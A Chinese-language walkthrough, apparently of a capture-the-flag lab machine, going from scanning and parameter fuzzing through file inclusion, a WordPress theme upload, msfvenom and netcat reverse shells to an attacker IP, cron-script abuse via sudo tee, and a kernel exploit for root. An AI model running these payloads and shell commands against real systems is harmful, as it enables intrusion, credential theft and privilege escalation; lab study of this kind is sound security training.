补充:端口扫描其他方法 netdiscover -p arp-scan ? 三、目录扫描 dirb http://192.168.178.133 --> 获取index.PHP,image.PHP dirb http://192.168.178.133 -X .PHP,.txt,.zip ———》获取secrt.txt文件 curl http://192.168.178.133/secrt.txt ——》获取fuzz方法获取参数提醒,获取location.txt文件提醒
补充学习:目录扫描其他方法 nikto -host 192.168.178.133 四、FUZZ获取参数名 wfuzz -w /usr/share/wfuzz/wordlist/genrual/commom.txt http://192.168.178.133/index.PHP?FUZZ wfuzz -C -w /usr/share/wfuzz/wordlist/genrual/commom.txt --hw 12 http://192.168.178.133/index.PHP?FUZZ ——》获取fuzz参数为file curl http://192.168.178.133/index.php?file=location.txt ——》获取真实参数secrettier360
补充:fuzz的另一个应用场景——密码爆破 wfuzz -z file,user-dict(字典) -z file,pass-dict --hw 87 "http://192.168.142.139/manage.PHP?username=FUZZ&password=FUZ2Z" 五、LFI文件包含漏洞 curl http://192.168.178.133/image.php?secrettier360=/etc/passwd ——》saket:x:1001:1001:find password.txt file in my directory:/home/saket: curl http://192.168.178.133/image.php?secrettier360=/home/saket/password.txt ——》follow_the_ippsec 六、登录wp vitor和follow_the_ippsec cmseek -u http://192.168.178.133/wordpress/ ——》或者wordpress漏洞ThemeEditor wpscan --url http://192.168.178.133/wordpress --enumerate u 七、MSF生成payload反弹shell提权 1、 msfvenom -p PHP/meterpreter/reverse_tcp lhost=192.168.178.131 lport=7777 -o shell.PHP ——》生成shell.PHP cat shell.PHP 放入网页上传 2、攻击机进入msfconsole msf6 > use exploit/multi/handler //进入监听模块 set payload PHP/meterpreter/reverse_tcp set lhost 192.168.178.131 set lport 7777 exploit 开始监听 触发: http://192.168.178.133/wordpress/wp-content/themes/twentynineteen/secret.php 进入meterpreter >
补充:java脚本生成比较 msfvenom -p PHP/meterpreter/reverse_tcp lhost=192.168.178.131 lport=7777 -o shell.PHP msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.128 lport=4444 -f war -o kali.war 补充2:nc的用法开启监听 通过tee命令将恶意脚本写入tidyup.sh(某一计划任务执行的文件) 1、echo "nc -e /bin/bash 192.168.110.128 5555" > shell.PHP 2、cat shell.PHP | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh //sudo具有sudo普通用户执行root权限 攻击机开启监听: nc -lvvp 5555 八、搜索目标机操作系统漏洞 msf6 > searchsploit 16.04 Ubuntu linux/local/45010.c cd /usr/share/exploitdb/exploits/linux/local/ cp 45010.c /root cd /root gcc 45010.c -o 45010 meterpreter >upload /root/45010 /tmp/45010 //漏洞上传到目录 meterpreter > shell python -c 'import pty;pty.spawn("/bin/bash")' //以交互界面显示 cd /tmp chmod +x 45010 ./45010 whoami root cd /root cat root.txt b2b17036da1de94cfb024540a8e7075a
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。